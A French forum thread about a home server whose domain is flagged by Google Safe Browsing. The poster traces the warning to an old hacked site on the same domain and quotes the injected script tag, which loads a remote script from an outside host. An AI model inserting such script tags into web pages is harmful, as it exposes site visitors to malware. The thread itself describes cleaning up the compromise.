[Résolvé] Fonctionnement réseau d'une requête web

[Mout]

Salut tout le monde,
 
Je suis dans l'incompréhension.
 
J'ai un mini server qui fait :
- Serveur DNS,
- Serveur web sur divers ports
--- Plex, port 32400
--- SickBeard, port 8081
--- qBittorrent, port 8082
--- ...
--- owncloud, port 443, ouvert sur la freebox
--- rien sur le port 80, et pourtant ouvert sur la freebox (reste de tests divers et d'été)
 
J'interroge tout cela depuis mon macbook, Mavericks à jour, Chrome, Safari et Firefox aussi.
 
Voila le problème : lorsque j'appelle l'un de ces sites *depuis chez moi*, mais depuis mon macbook (son DNS est le mini), j'ai deux comportements différents :
- si j'appelle avec le nom de domaine mini.mon.domaine.com:port, j'ai un bel avertissement rouge de Google Safebrowsing qui me dit que mon site est dangereux et qu'il contient des logiciels malveillants.
- si j'appelle avec l'ip 192.168.0.100:port, j'ai mon site comme il faut.
 
Ceci à la fois sous Chrome, Safari et Firefox. Sous Mac, uniquement. Pas sous iOS. Pas de Windows à portée de main.
 
Sachant que mon serveur DNS est interne, que la plupart des ports sont fermés, comment se fait-il que Google vienne mettre son grain de sel ? Quel est le mécanisme réseau d'une requête HTTP avec domaine, et sans domaine ? Est-ce que les navigateurs interrogent quelque chose avant de taper réellement dans le serveur ?
 
Si c'est le cas, je dois en conclure que Google est venu fouiller mon serveur par le 80, a vu que rien ne répondait, et en a conclu que ca n'allait pas. Il a décidé de blacklister mon nom de domaine, c'est ca ? Mais ce qui est dingue, c'est que le navigateur ne semble meme pas savoir que derrière ce nom de domaine, il y a une ip privée ! 
 
une idée ?

[Guest pim]

Dites moi si je me trompe mais Google ne connaît pas ton site donc le classe dans les sites inconnus, tout simplement ! Il te signale que tu n'es pas sur internet mais dans l'ordinateur d'un inconnu, qui peut donc faire de toi ce qu'il veut. Il n'y a que toi qui ne flippe pas à l'idée d'être enfermée chez toi, mais les autres humains ça les fait flipper grave !!!

 

[Mout]

Bon. J'ai trouvé le problème, qui n'est absolument pas lié à mon mac mini.
Mon nom de domaine domaine.com donne accès à un vrai site.
Une première version de ce site persistait dans un coin de serveur, mais l'index.html redirige les visiteurs vers le nouveau site qui a un nom de domaine différent : domaine.fr
Malheureusement, l'ancien site avait subi une injection de code, et une saloperie de 

script type="text/javascript" src="http://unsiteàlacon.de/display.php"

s'était insinué dans le head de certaines pages.

 

Forcément, tout le domaine a été mis en "sécurité", et de fait, mes redirections privées vers chez moi aussi, ainsi que mes petits sites internes, consultés avec des navigateurs qui ont appris que domaine.com était en quarantaine. Heureusement, le mail n'a pas été atteint.

 

J'ai donc fini d'effacer l'ancien site, viré cette ligne injectée dans l'index.html, changé le mot de passe FTP, et redemandé un contrôle par Google. Verdict dans les 24 heures.

 

Voila !

Merci de m'avoir lu

[Mout]

 redemandé un contrôle par Google. Verdict dans les 24 heures.

Voila, c'est du rapide. C'est réparé Mout content !

[Guest pim]

Comme quoi, qui comprends le code est le maître chez lui !

[Mout]

Google m'a aidé aussi